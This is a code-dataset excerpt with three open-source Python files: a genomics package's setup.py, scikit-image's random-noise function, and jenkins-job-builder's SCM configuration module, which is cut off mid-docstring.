| text (string, 12-1.05M chars) | repo_name (string, 5-86 chars) | path (string, 4-191 chars) | language (string, 1 class) | license (string, 15 classes) | size (int32, 12-1.05M) | keyword (list, 1-23 items) | text_hash (string, 64 chars) |
|---|---|---|---|---|---|---|---|
# Copyright (c) 2014-2018. Mount Sinai School of Medicine
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import os
import re
from setuptools import setup
current_directory = os.path.dirname(__file__)
with open(os.path.join(current_directory, 'varlens', '__init__.py'), 'r') as f:
version = re.search(
r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]',
f.read(),
re.MULTILINE).group(1)
if __name__ == '__main__':
setup(
name='varlens',
packages=["varlens", "varlens.commands", "varlens.read_evidence"],
version=version,
description=(
"commandline manipulation of genomic variants and NGS reads"),
long_description=open('README.rst').read(),
url="https://github.com/openvax/varlens",
author="Tim O'Donnell",
author_email="timodonnell@gmail.com",
license="http://www.apache.org/licenses/LICENSE-2.0.html",
entry_points={
'console_scripts': [
'varlens-allele-support = varlens.commands.allele_support:run',
'varlens-variants = varlens.commands.variants:run',
'varlens-reads = varlens.commands.reads:run',
],
},
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Console',
'Operating System :: OS Independent',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python',
'Topic :: Scientific/Engineering :: Bio-Informatics',
],
install_requires=[
'cython>=0.21',
'numpy',
'intervaltree',
'pysam>=0.13',
'typechecks',
'varcode',
'pyfaidx',
'mhctools',
'topiary',
],
)
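# Editor's note (illustrative, not part of the original setup.py): after
# `pip install .`, each console_scripts entry above becomes a shell command,
# e.g. `varlens-reads --help`, which dispatches to varlens.commands.reads:run.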
|
hammerlab/varlens
|
setup.py
|
Python
|
apache-2.0
| 2,375
|
[
"pysam"
] |
de7b7fa6e101ddd73047b49b9e3376760b75da44f2580574c8fd1e7ae817dc5b
|
import numpy as np
from .dtype import img_as_float
__all__ = ['random_noise']
def random_noise(image, mode='gaussian', seed=None, clip=True, **kwargs):
"""
Function to add random noise of various types to a floating-point image.
Parameters
----------
image : ndarray
Input image data. Will be converted to float.
mode : str
One of the following strings, selecting the type of noise to add:
- 'gaussian' Gaussian-distributed additive noise.
- 'localvar' Gaussian-distributed additive noise, with specified
local variance at each point of `image`
- 'poisson' Poisson-distributed noise generated from the data.
- 'salt' Replaces random pixels with 1.
- 'pepper' Replaces random pixels with 0.
- 's&p' Replaces random pixels with 0 or 1.
- 'speckle' Multiplicative noise using out = image + n*image, where
n is uniform noise with specified mean & variance.
seed : int
If provided, this will set the random seed before generating noise,
for valid pseudo-random comparisons.
clip : bool
        If True (default), the output will be clipped after the noise is applied
for modes `'speckle'`, `'poisson'`, and `'gaussian'`. This is
needed to maintain the proper image data range. If False, clipping
is not applied, and the output may extend beyond the range [-1, 1].
mean : float
Mean of random distribution. Used in 'gaussian' and 'speckle'.
Default : 0.
var : float
Variance of random distribution. Used in 'gaussian' and 'speckle'.
Note: variance = (standard deviation) ** 2. Default : 0.01
local_vars : ndarray
Array of positive floats, same shape as `image`, defining the local
variance at every image point. Used in 'localvar'.
amount : float
Proportion of image pixels to replace with noise on range [0, 1].
        Used in 'salt', 'pepper', and 's&p'. Default : 0.05
salt_vs_pepper : float
Proportion of salt vs. pepper noise for 's&p' on range [0, 1].
Higher values represent more salt. Default : 0.5 (equal amounts)
Returns
-------
out : ndarray
Output floating-point image data on range [0, 1] or [-1, 1] if the
input `image` was unsigned or signed, respectively.
Notes
-----
Speckle, Poisson, Localvar, and Gaussian noise may generate noise outside
the valid image range. The default is to clip (not alias) these values,
but they may be preserved by setting `clip=False`. Note that in this case
the output may contain values outside the ranges [0, 1] or [-1, 1].
Use this option with care.
Because of the prevalence of exclusively positive floating-point images in
intermediate calculations, it is not possible to intuit if an input is
    signed based on dtype alone. Instead, negative values are explicitly
    searched for. Only if found does this function assume signed input.
    Unexpected results only occur in rare, poorly exposed cases (e.g. if all
values are above 50 percent gray in a signed `image`). In this event,
manually scaling the input to the positive domain will solve the problem.
The Poisson distribution is only defined for positive integers. To apply
this noise type, the number of unique values in the image is found and
the next round power of two is used to scale up the floating-point result,
after which it is scaled back down to the floating-point image range.
To generate Poisson noise against a signed image, the signed image is
temporarily converted to an unsigned image in the floating point domain,
Poisson noise is generated, then it is returned to the original range.
"""
mode = mode.lower()
# Detect if a signed image was input
if image.min() < 0:
low_clip = -1.
else:
low_clip = 0.
image = img_as_float(image)
if seed is not None:
np.random.seed(seed=seed)
allowedtypes = {
'gaussian': 'gaussian_values',
'localvar': 'localvar_values',
'poisson': 'poisson_values',
'salt': 'sp_values',
'pepper': 'sp_values',
's&p': 's&p_values',
'speckle': 'gaussian_values'}
kwdefaults = {
'mean': 0.,
'var': 0.01,
'amount': 0.05,
'salt_vs_pepper': 0.5,
'local_vars': np.zeros_like(image) + 0.01}
allowedkwargs = {
'gaussian_values': ['mean', 'var'],
'localvar_values': ['local_vars'],
'sp_values': ['amount'],
's&p_values': ['amount', 'salt_vs_pepper'],
'poisson_values': []}
for key in kwargs:
if key not in allowedkwargs[allowedtypes[mode]]:
raise ValueError('%s keyword not in allowed keywords %s' %
(key, allowedkwargs[allowedtypes[mode]]))
# Set kwarg defaults
for kw in allowedkwargs[allowedtypes[mode]]:
kwargs.setdefault(kw, kwdefaults[kw])
if mode == 'gaussian':
noise = np.random.normal(kwargs['mean'], kwargs['var'] ** 0.5,
image.shape)
out = image + noise
elif mode == 'localvar':
# Ensure local variance input is correct
if (kwargs['local_vars'] <= 0).any():
raise ValueError('All values of `local_vars` must be > 0.')
# Safe shortcut usage broadcasts kwargs['local_vars'] as a ufunc
out = image + np.random.normal(0, kwargs['local_vars'] ** 0.5)
elif mode == 'poisson':
# Determine unique values in image & calculate the next power of two
vals = len(np.unique(image))
vals = 2 ** np.ceil(np.log2(vals))
# Ensure image is exclusively positive
if low_clip == -1.:
old_max = image.max()
image = (image + 1.) / (old_max + 1.)
# Generating noise for each unique value in image.
out = np.random.poisson(image * vals) / float(vals)
# Return image to original range if input was signed
if low_clip == -1.:
out = out * (old_max + 1.) - 1.
elif mode == 'salt':
# Re-call function with mode='s&p' and p=1 (all salt noise)
out = random_noise(image, mode='s&p', seed=seed,
amount=kwargs['amount'], salt_vs_pepper=1.)
elif mode == 'pepper':
# Re-call function with mode='s&p' and p=1 (all pepper noise)
out = random_noise(image, mode='s&p', seed=seed,
amount=kwargs['amount'], salt_vs_pepper=0.)
elif mode == 's&p':
# This mode makes no effort to avoid repeat sampling. Thus, the
# exact number of replaced pixels is only approximate.
out = image.copy()
# Salt mode
num_salt = np.ceil(
kwargs['amount'] * image.size * kwargs['salt_vs_pepper'])
        # Index with a tuple of arrays; list-of-arrays indexing is rejected
        # by modern NumPy
        coords = tuple(np.random.randint(0, i - 1, int(num_salt))
                       for i in image.shape)
        out[coords] = 1
# Pepper mode
num_pepper = np.ceil(
kwargs['amount'] * image.size * (1. - kwargs['salt_vs_pepper']))
        coords = tuple(np.random.randint(0, i - 1, int(num_pepper))
                       for i in image.shape)
        out[coords] = low_clip
elif mode == 'speckle':
noise = np.random.normal(kwargs['mean'], kwargs['var'] ** 0.5,
image.shape)
out = image + image * noise
# Clip back to original range, if necessary
if clip:
out = np.clip(out, low_clip, 1.0)
return out
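# --- Editor's sketch (illustrative, not part of the original module) ---
# A minimal example of calling random_noise, assuming the module has been
# imported as part of its package (the relative import of img_as_float above
# prevents running this file directly as a script):
#
#     >>> img = np.linspace(0, 1, 64).reshape(8, 8)
#     >>> noisy = random_noise(img, mode='gaussian', var=0.02, seed=42)
#     >>> salty = random_noise(img, mode='s&p', amount=0.1, salt_vs_pepper=0.9)
#     >>> bool(noisy.min() >= 0.0 and noisy.max() <= 1.0)
#     True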
|
Hiyorimi/scikit-image
|
skimage/util/noise.py
|
Python
|
bsd-3-clause
| 7,628
|
[
"Gaussian"
] |
76968f7e0b827c652e9a807193692ec11c4abbb20c90ee7200c9b192591559eb
|
# Copyright 2012 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
The SCM module allows you to specify the source code location for the
project. It adds the ``scm`` attribute to the :ref:`Job` definition,
which accepts any number of scm definitions. It is also possible to pass
``[]`` to the ``scm`` attribute. This is useful when a set of configs has a
global default ``scm`` and you want a particular job to override that
default with no SCM.
**Component**: scm
:Macro: scm
:Entry Point: jenkins_jobs.scm
The scm module allows referencing multiple repositories in a Jenkins job.
Note: Adding more than one scm definition requires the Jenkins
:jenkins-wiki:`Multiple SCMs plugin <Multiple+SCMs+Plugin>`.
Example of multiple repositories in a single job:
.. literalinclude:: /../../tests/macros/fixtures/scm/multi-scms001.yaml
Example of an empty ``scm``:
.. literalinclude:: /../../tests/scm/fixtures/empty.yaml
"""
import logging
import xml.etree.ElementTree as XML
import jenkins_jobs.modules.base
from jenkins_jobs.errors import (InvalidAttributeError,
JenkinsJobsException,
MissingAttributeError)
def git(parser, xml_parent, data):
"""yaml: git
Specifies the git SCM repository for this job.
Requires the Jenkins :jenkins-wiki:`Git Plugin <Git+Plugin>`.
:arg str url: URL of the git repository
:arg str credentials-id: ID of credential to use to connect, which is the
last field (a 32-digit hexadecimal code) of the path of URL visible
after you clicked the credential under Jenkins Global credentials.
(optional)
:arg str refspec: refspec to fetch (default
'+refs/heads/\*:refs/remotes/remoteName/\*')
:arg str name: name to fetch (default 'origin')
:arg list(str) remotes: list of remotes to set up (optional, only needed if
multiple remotes need to be set up)
:Remote:
* **url** (`string`) - url of remote repo
* **refspec** (`string`) - refspec to fetch (optional)
* **credentials-id** - ID of credential to use to connect, which
is the last field of the path of URL (a 32-digit hexadecimal
code) visible after you clicked credential under Jenkins Global
credentials. (optional)
:arg list(str) branches: list of branch specifiers to build (default '**')
:arg list(str) excluded-users: list of users to ignore revisions from
when polling for changes. (if polling is enabled, optional)
:arg list(str) included-regions: list of file/folders to include (optional)
:arg list(str) excluded-regions: list of file/folders to exclude (optional)
:arg str local-branch: Checkout/merge to local branch (optional)
:arg dict merge:
:merge:
* **remote** (`string`) - name of repo that contains branch to
merge to (default 'origin')
* **branch** (`string`) - name of the branch to merge to
* **strategy** (`string`) - merge strategy. Can be one of
'default', 'resolve', 'recursive', 'octopus', 'ours',
'subtree'. (default 'default')
* **fast-forward-mode** (`string`) - merge fast-forward mode.
Can be one of 'FF', 'FF_ONLY' or 'NO_FF'. (default 'FF')
:arg str basedir: location relative to the workspace root to clone to
(default workspace)
:arg bool skip-tag: Skip tagging (default false)
:arg bool shallow-clone: Perform shallow clone (default false)
:arg bool prune: Prune remote branches (default false)
:arg bool clean: Clean after checkout (default false)
.. deprecated:: 1.1.1. Please use clean extension format.
:arg bool fastpoll: Use fast remote polling (default false)
:arg bool disable-submodules: Disable submodules (default false)
.. deprecated:: 1.1.1. Please use submodule extension.
:arg bool recursive-submodules: Recursively update submodules (default
false)
.. deprecated:: 1.1.1. Please use submodule extension.
    :arg bool use-author: Use author rather than committer in Jenkins' build
changeset (default false)
:arg str git-tool: The name of the Git installation to use (default
'Default')
:arg str reference-repo: Path of the reference repo to use during clone
(optional)
:arg str scm-name: The unique scm name for this Git SCM (optional)
:arg bool ignore-notify: Ignore notifyCommit URL accesses (default false)
:arg str browser: what repository browser to use.
:browsers supported:
* **auto** - (default)
* **assemblaweb** - https://www.assembla.com/
* **bitbucketweb** - https://www.bitbucket.org/
* **cgit** - http://git.zx2c4.com/cgit/about/
* **fisheye** - https://www.atlassian.com/software/fisheye
* **gitblit** - http://gitblit.com/
* **githubweb** - https://github.com/
* **gitiles** - https://code.google.com/p/gitiles/
* **gitlab** - https://about.gitlab.com/
* **gitlist** - http://gitlist.org/
* **gitoriousweb** - https://gitorious.org/
* **gitweb** - http://git-scm.com/docs/gitweb
* **kiln** - https://www.fogcreek.com/kiln/
* **microsoft\-tfs\-2013** - |tfs_2013|
* **phabricator** - http://phabricator.org/
* **redmineweb** - http://www.redmine.org/
* **rhodecode** - https://rhodecode.com/
* **stash** - https://www.atlassian.com/software/stash
* **viewgit** - http://viewgit.fealdia.org/
:arg str browser-url: url for the repository browser (required if browser
is not 'auto', no default)
:arg str browser-version: version of the repository browser (GitLab only,
default '0.0')
:arg str project-name: project name in Gitblit and ViewGit repobrowser
(optional)
:arg str repo-name: repository name in phabricator repobrowser (optional)
:arg str choosing-strategy: Jenkins class for selecting what to build.
Can be one of `default`, `inverse`, or `gerrit` (default 'default')
:arg str git-config-name: Configure name for Git clone (optional)
:arg str git-config-email: Configure email for Git clone (optional)
:extensions:
* **changelog-against** (`dict`)
* **remote** (`string`) - name of repo that contains branch to
create changelog against (default 'origin')
* **branch** (`string`) - name of the branch to create changelog
against (default 'master')
* **clean** (`dict`)
* **after** (`bool`) - Clean the workspace after checkout
* **before** (`bool`) - Clean the workspace before checkout
* **ignore-commits-with-messages** (`list(str)`) - Revisions committed
with messages matching these patterns will be ignored. (optional)
* **force-polling-using-workspace** (`bool`) - Force polling using
workspace (default false)
* **sparse-checkout** (`dict`)
* **paths** (`list`) - List of paths to sparse checkout. (optional)
* **submodule** (`dict`)
* **disable** (`bool`) - By disabling support for submodules you
can still keep using basic git plugin functionality and just have
Jenkins to ignore submodules completely as if they didn't exist.
* **recursive** (`bool`) - Retrieve all submodules recursively
(uses '--recursive' option which requires git>=1.6.5)
* **tracking** (`bool`) - Retrieve the tip of the configured
branch in .gitmodules (Uses '\-\-remote' option which requires
git>=1.8.2)
* **timeout** (`int`) - Specify a timeout (in minutes) for
submodules operations (default: 10).
* **timeout** (`str`) - Timeout for git commands in minutes (optional)
* **wipe-workspace** (`bool`) - Wipe out workspace before build
(default true)
Example:
.. literalinclude:: /../../tests/scm/fixtures/git001.yaml
.. |tfs_2013| replace::
https://www.visualstudio.com/en-us/products/tfs-overview-vs.aspx
"""
logger = logging.getLogger("%s:git" % __name__)
# XXX somebody should write the docs for those with option name =
# None so we have a sensible name/key for it.
mapping = [
# option, xml name, default value (text), attributes (hard coded)
("disable-submodules", 'disableSubmodules', False),
("recursive-submodules", 'recursiveSubmodules', False),
(None, 'doGenerateSubmoduleConfigurations', False),
("use-author", 'authorOrCommitter', False),
("wipe-workspace", 'wipeOutWorkspace', True),
("prune", 'pruneBranches', False),
("fastpoll", 'remotePoll', False),
("git-tool", 'gitTool', "Default"),
(None, 'submoduleCfg', '', {'class': 'list'}),
('basedir', 'relativeTargetDir', ''),
('reference-repo', 'reference', ''),
("git-config-name", 'gitConfigName', ''),
("git-config-email", 'gitConfigEmail', ''),
('skip-tag', 'skipTag', False),
('scm-name', 'scmName', ''),
("shallow-clone", "useShallowClone", False),
("ignore-notify", "ignoreNotifyCommit", False),
]
choosing_strategies = {
'default': 'hudson.plugins.git.util.DefaultBuildChooser',
'gerrit': ('com.sonyericsson.hudson.plugins.'
'gerrit.trigger.hudsontrigger.GerritTriggerBuildChooser'),
'inverse': 'hudson.plugins.git.util.InverseBuildChooser',
}
scm = XML.SubElement(xml_parent,
'scm', {'class': 'hudson.plugins.git.GitSCM'})
XML.SubElement(scm, 'configVersion').text = '2'
user = XML.SubElement(scm, 'userRemoteConfigs')
if 'remotes' not in data:
data['remotes'] = [{data.get('name', 'origin'): data.copy()}]
for remoteData in data['remotes']:
huser = XML.SubElement(user, 'hudson.plugins.git.UserRemoteConfig')
remoteName = next(iter(remoteData.keys()))
XML.SubElement(huser, 'name').text = remoteName
remoteParams = next(iter(remoteData.values()))
if 'refspec' in remoteParams:
refspec = remoteParams['refspec']
else:
refspec = '+refs/heads/*:refs/remotes/' + remoteName + '/*'
XML.SubElement(huser, 'refspec').text = refspec
if 'url' in remoteParams:
remoteURL = remoteParams['url']
else:
raise JenkinsJobsException('Must specify a url for git remote \"' +
remoteName + '"')
XML.SubElement(huser, 'url').text = remoteURL
if 'credentials-id' in remoteParams:
credentialsId = remoteParams['credentials-id']
XML.SubElement(huser, 'credentialsId').text = credentialsId
xml_branches = XML.SubElement(scm, 'branches')
branches = data.get('branches', ['**'])
for branch in branches:
bspec = XML.SubElement(xml_branches, 'hudson.plugins.git.BranchSpec')
XML.SubElement(bspec, 'name').text = branch
excluded_users = '\n'.join(data.get('excluded-users', []))
XML.SubElement(scm, 'excludedUsers').text = excluded_users
if 'merge' in data:
merge = data['merge']
merge_strategies = ['default', 'resolve', 'recursive', 'octopus',
'ours', 'subtree']
fast_forward_modes = ['FF', 'FF_ONLY', 'NO_FF']
name = merge.get('remote', 'origin')
branch = merge['branch']
urc = XML.SubElement(scm, 'userMergeOptions')
XML.SubElement(urc, 'mergeRemote').text = name
XML.SubElement(urc, 'mergeTarget').text = branch
strategy = merge.get('strategy', 'default')
if strategy not in merge_strategies:
raise InvalidAttributeError('strategy', strategy, merge_strategies)
XML.SubElement(urc, 'mergeStrategy').text = strategy
fast_forward_mode = merge.get('fast-forward-mode', 'FF')
if fast_forward_mode not in fast_forward_modes:
raise InvalidAttributeError('fast-forward-mode', fast_forward_mode,
fast_forward_modes)
XML.SubElement(urc, 'fastForwardMode').text = fast_forward_mode
try:
choosing_strategy = choosing_strategies[data.get('choosing-strategy',
'default')]
except KeyError:
raise ValueError('Invalid choosing-strategy %r' %
data.get('choosing-strategy'))
XML.SubElement(scm, 'buildChooser', {'class': choosing_strategy})
for elem in mapping:
(optname, xmlname, val) = elem[:3]
# Throw warning for deprecated settings and skip if the 'submodule' key
# is available.
submodule_cfgs = ['disable-submodules', 'recursive-submodules']
if optname in submodule_cfgs:
if optname in data:
logger.warn("'{0}' is deprecated, please convert to use the "
"'submodule' section instead as support for this "
"top level option will be removed in a future "
"release.".format(optname))
if 'submodule' in data:
continue
attrs = {}
if len(elem) >= 4:
attrs = elem[3]
xe = XML.SubElement(scm, xmlname, attrs)
if optname and optname in data:
val = data[optname]
if type(val) == bool:
xe.text = str(val).lower()
else:
xe.text = val
if 'local-branch' in data:
XML.SubElement(scm, 'localBranch').text = data['local-branch']
exts_node = XML.SubElement(scm, 'extensions')
impl_prefix = 'hudson.plugins.git.extensions.impl.'
if 'included-regions' in data or 'excluded-regions' in data:
ext_name = XML.SubElement(exts_node,
'hudson.plugins.git.extensions.impl.'
'PathRestriction')
if 'included-regions' in data:
include_string = '\n'.join(data['included-regions'])
XML.SubElement(ext_name, 'includedRegions').text = include_string
if 'excluded-regions' in data:
exclude_string = '\n'.join(data['excluded-regions'])
XML.SubElement(ext_name, 'excludedRegions').text = exclude_string
if 'changelog-against' in data:
ext_name = impl_prefix + 'ChangelogToBranch'
ext = XML.SubElement(exts_node, ext_name)
opts = XML.SubElement(ext, 'options')
change_remote = data['changelog-against'].get('remote', 'origin')
change_branch = data['changelog-against'].get('branch', 'master')
XML.SubElement(opts, 'compareRemote').text = change_remote
XML.SubElement(opts, 'compareTarget').text = change_branch
if 'clean' in data:
# Keep support for old format 'clean' configuration by checking
# if 'clean' is boolean. Else we're using the new extensions style.
if isinstance(data['clean'], bool):
clean_after = data['clean']
clean_before = False
logger.warn("'clean: bool' configuration format is deprecated, "
"please use the extension style format to configure "
"this option.")
else:
clean_after = data['clean'].get('after', False)
clean_before = data['clean'].get('before', False)
if clean_after:
ext_name = impl_prefix + 'CleanCheckout'
ext = XML.SubElement(exts_node, ext_name)
if clean_before:
ext_name = impl_prefix + 'CleanBeforeCheckout'
ext = XML.SubElement(exts_node, ext_name)
if 'ignore-commits-with-messages' in data:
for msg in data['ignore-commits-with-messages']:
ext_name = impl_prefix + 'MessageExclusion'
ext = XML.SubElement(exts_node, ext_name)
XML.SubElement(ext, 'excludedMessage').text = msg
if 'sparse-checkout' in data:
ext_name = impl_prefix + 'SparseCheckoutPaths'
ext = XML.SubElement(exts_node, ext_name)
sparse_co = XML.SubElement(ext, 'sparseCheckoutPaths')
sparse_paths = data['sparse-checkout'].get('paths')
if sparse_paths is not None:
path_tagname = impl_prefix + 'SparseCheckoutPath'
for path in sparse_paths:
path_tag = XML.SubElement(sparse_co, path_tagname)
XML.SubElement(path_tag, 'path').text = path
if 'submodule' in data:
ext_name = impl_prefix + 'SubmoduleOption'
ext = XML.SubElement(exts_node, ext_name)
XML.SubElement(ext, 'disableSubmodules').text = str(
data['submodule'].get('disable', False)).lower()
XML.SubElement(ext, 'recursiveSubmodules').text = str(
data['submodule'].get('recursive', False)).lower()
XML.SubElement(ext, 'trackingSubmodules').text = str(
data['submodule'].get('tracking', False)).lower()
XML.SubElement(ext, 'timeout').text = str(
data['submodule'].get('timeout', 10))
if 'timeout' in data:
co = XML.SubElement(exts_node, impl_prefix + 'CheckoutOption')
XML.SubElement(co, 'timeout').text = str(data['timeout'])
polling_using_workspace = str(data.get('force-polling-using-workspace',
False)).lower()
if polling_using_workspace == 'true':
ext_name = impl_prefix + 'DisableRemotePoll'
ext = XML.SubElement(exts_node, ext_name)
# By default we wipe the workspace
wipe_workspace = str(data.get('wipe-workspace', True)).lower()
if wipe_workspace == 'true':
ext_name = impl_prefix + 'WipeWorkspace'
ext = XML.SubElement(exts_node, ext_name)
browser = data.get('browser', 'auto')
browserdict = {'auto': 'auto',
'assemblaweb': 'AssemblaWeb',
'bitbucketweb': 'BitbucketWeb',
'cgit': 'CGit',
'fisheye': 'FisheyeGitRepositoryBrowser',
'gitblit': 'GitBlitRepositoryBrowser',
'githubweb': 'GithubWeb',
'gitiles': 'Gitiles',
'gitlab': 'GitLab',
'gitlist': 'GitList',
'gitoriousweb': 'GitoriousWeb',
'gitweb': 'GitWeb',
'kiln': 'KilnGit',
'microsoft-tfs-2013': 'TFS2013GitRepositoryBrowser',
'phabricator': 'Phabricator',
'redmineweb': 'RedmineWeb',
'rhodecode': 'RhodeCode',
'stash': 'Stash',
'viewgit': 'ViewGitWeb'}
if browser not in browserdict:
valid = sorted(browserdict.keys())
raise JenkinsJobsException("Browser entered is not valid must be one "
"of: %s or %s." % (", ".join(valid[:-1]),
valid[-1]))
if browser != 'auto':
bc = XML.SubElement(scm, 'browser', {'class':
'hudson.plugins.git.browser.' +
browserdict[browser]})
XML.SubElement(bc, 'url').text = data['browser-url']
if browser in ['gitblit', 'viewgit']:
XML.SubElement(bc, 'projectName').text = str(
data.get('project-name', ''))
if browser == 'gitlab':
XML.SubElement(bc, 'version').text = str(
data.get('browser-version', '0.0'))
if browser == 'phabricator':
XML.SubElement(bc, 'repo').text = str(
data.get('repo-name', ''))
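# Editor's sketch (illustrative, not part of the original module): a minimal
# JJB YAML fragment exercising the git macro above. The values are
# hypothetical; the shipped examples live under tests/scm/fixtures/.
#
#   scm:
#     - git:
#         url: https://example.com/project.git
#         branches:
#           - master
#         wipe-workspace: true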
def cvs(parser, xml_parent, data):
"""yaml: cvs
Specifies the CVS SCM repository for this job.
Requires the Jenkins :jenkins-wiki:`CVS Plugin <CVS+Plugin>`.
:arg list repos: List of CVS repositories. (required)
:Repos:
* **root** (`str`) -- The CVS connection string Jenkins uses to
connect to the server. The format is :protocol:user@host:path
(required)
* **locations** (`list`) -- List of locations. (required)
:Locations:
* **type** (`str`) -- Type of location.
:supported values:
* **HEAD** - (default)
* **BRANCH**
* **TAG**
* **name** (`str`) -- Name of location. Only valid in case
of 'BRANCH' or 'TAG' location type. (default '')
* **use-head** (`bool`) -- Use Head if not found. Only
valid in case of 'BRANCH' or 'TAG' location type.
(default false)
* **modules** (`list`) -- List of modules. (required)
:Modules:
* **remote** -- The name of the module in the
repository at CVSROOT. (required)
* **local-name** -- The name to be applied to
this module in the local workspace. If blank,
the remote module name will be used.
(default '')
* **excluded-regions** (`list str`) -- Patterns for excluding
regions. (optional)
* **compression-level** (`int`) -- Compression level. Must be a
number between -1 and 9 inclusive. Choose -1 for System Default.
(default -1)
:arg bool use-update: If true, Jenkins will use 'cvs update' whenever
possible for builds. This makes a build faster. But this also causes the
artifacts from the previous build to remain in the file system when a
new build starts, making it not a true clean build. (default true)
:arg bool prune-empty: Remove empty directories after checkout using the
CVS '-P' option. (default true)
:arg bool skip-changelog: Prevent the changelog being generated after
checkout has completed. (default false)
:arg bool show-all-output: Instructs CVS to show all logging output. CVS
normally runs in quiet mode but this option disables that.
(default false)
:arg bool clean-checkout: Perform clean checkout on failed update.
(default false)
:arg bool clean-copy: Force clean copy for locally modified files.
(default false)
Example
.. literalinclude:: /../../tests/scm/fixtures/cvs001.yaml
:language: yaml
.. literalinclude:: /../../tests/scm/fixtures/cvs002.yaml
:language: yaml
"""
prefix = 'hudson.scm.'
valid_loc_types = {'HEAD': 'Head', 'TAG': 'Tag', 'BRANCH': 'Branch'}
cvs = XML.SubElement(xml_parent, 'scm', {'class': prefix + 'CVSSCM'})
repos = data.get('repos')
if not repos:
raise JenkinsJobsException("'repos' empty or missing")
repos_tag = XML.SubElement(cvs, 'repositories')
for repo in repos:
repo_tag = XML.SubElement(repos_tag, prefix + 'CvsRepository')
try:
XML.SubElement(repo_tag, 'cvsRoot').text = repo['root']
except KeyError:
raise MissingAttributeError('root')
items_tag = XML.SubElement(repo_tag, 'repositoryItems')
locations = repo.get('locations')
if not locations:
raise JenkinsJobsException("'locations' empty or missing")
for location in locations:
item_tag = XML.SubElement(items_tag, prefix + 'CvsRepositoryItem')
loc_type = location.get('type', 'HEAD')
if loc_type not in valid_loc_types:
raise InvalidAttributeError('type', loc_type, valid_loc_types)
loc_class = ('{0}CvsRepositoryLocation${1}Repository'
'Location').format(prefix, valid_loc_types[loc_type])
loc_tag = XML.SubElement(item_tag, 'location',
{'class': loc_class})
XML.SubElement(loc_tag, 'locationType').text = loc_type
if loc_type == 'TAG' or loc_type == 'BRANCH':
XML.SubElement(loc_tag, 'locationName').text = location.get(
'name', '')
XML.SubElement(loc_tag, 'useHeadIfNotFound').text = str(
location.get('use-head', False)).lower()
modules = location.get('modules')
if not modules:
raise JenkinsJobsException("'modules' empty or missing")
modules_tag = XML.SubElement(item_tag, 'modules')
for module in modules:
module_tag = XML.SubElement(modules_tag, prefix + 'CvsModule')
try:
XML.SubElement(module_tag, 'remoteName'
).text = module['remote']
except KeyError:
raise MissingAttributeError('remote')
XML.SubElement(module_tag, 'localName').text = module.get(
'local-name', '')
excluded = repo.get('excluded-regions', [])
excluded_tag = XML.SubElement(repo_tag, 'excludedRegions')
for pattern in excluded:
pattern_tag = XML.SubElement(excluded_tag,
prefix + 'ExcludedRegion')
XML.SubElement(pattern_tag, 'pattern').text = pattern
compression_level = repo.get('compression-level', '-1')
if int(compression_level) not in range(-1, 10):
raise InvalidAttributeError('compression-level',
compression_level, range(-1, 10))
XML.SubElement(repo_tag, 'compressionLevel').text = compression_level
mapping = [('use-update', 'canUseUpdate', True),
('prune-empty', 'pruneEmptyDirectories', True),
('skip-changelog', 'skipChangeLog', False),
('show-all-output', 'disableCvsQuiet', False),
('clean-checkout', 'cleanOnFailedUpdate', False),
('clean-copy', 'forceCleanCopy', False)]
for elem in mapping:
opt, xml_tag, val = elem[:]
XML.SubElement(cvs, xml_tag).text = str(
data.get(opt, val)).lower()
def repo(parser, xml_parent, data):
"""yaml: repo
Specifies the repo SCM repository for this job.
Requires the Jenkins :jenkins-wiki:`Repo Plugin <Repo+Plugin>`.
:arg str manifest-url: URL of the repo manifest
:arg str manifest-branch: The branch of the manifest to use (optional)
:arg str manifest-file: Initial manifest file to use when initialising
(optional)
:arg str manifest-group: Only retrieve those projects in the manifest
tagged with the provided group name (optional)
:arg str destination-dir: Location relative to the workspace root to clone
under (optional)
:arg str repo-url: custom url to retrieve the repo application (optional)
:arg str mirror-dir: Path to mirror directory to reference when
initialising (optional)
:arg int jobs: Number of projects to fetch simultaneously (default 0)
:arg bool current-branch: Fetch only the current branch from the server
(default true)
:arg bool quiet: Make repo more quiet
(default true)
:arg str local-manifest: Contents of .repo/local_manifest.xml, written
prior to calling sync (optional)
Example:
.. literalinclude:: /../../tests/scm/fixtures/repo001.yaml
"""
scm = XML.SubElement(xml_parent,
'scm', {'class': 'hudson.plugins.repo.RepoScm'})
if 'manifest-url' in data:
XML.SubElement(scm, 'manifestRepositoryUrl').text = \
data['manifest-url']
else:
raise JenkinsJobsException("Must specify a manifest url")
mapping = [
# option, xml name, default value
("manifest-branch", 'manifestBranch', ''),
("manifest-file", 'manifestFile', ''),
("manifest-group", 'manifestGroup', ''),
("destination-dir", 'destinationDir', ''),
("repo-url", 'repoUrl', ''),
("mirror-dir", 'mirrorDir', ''),
("jobs", 'jobs', 0),
("current-branch", 'currentBranch', True),
("quiet", 'quiet', True),
("local-manifest", 'localManifest', ''),
]
for elem in mapping:
(optname, xmlname, val) = elem
val = data.get(optname, val)
# Skip adding xml entry if default is empty string and no value given
        if not val and elem[2] == '':
continue
xe = XML.SubElement(scm, xmlname)
if type(elem[2]) == bool:
xe.text = str(val).lower()
else:
xe.text = str(val)
def store(parser, xml_parent, data):
"""yaml: store
Specifies the Visualworks Smalltalk Store repository for this job.
Requires the Jenkins :jenkins-wiki:`Visualworks Smalltalk Store Plugin
<Visualworks+Smalltalk+Store+Plugin>`.
:arg str script: name of the Store script to run
:arg str repository: name of the Store repository
:arg str version-regex: regular expression that specifies which pundle
versions should be considered (optional)
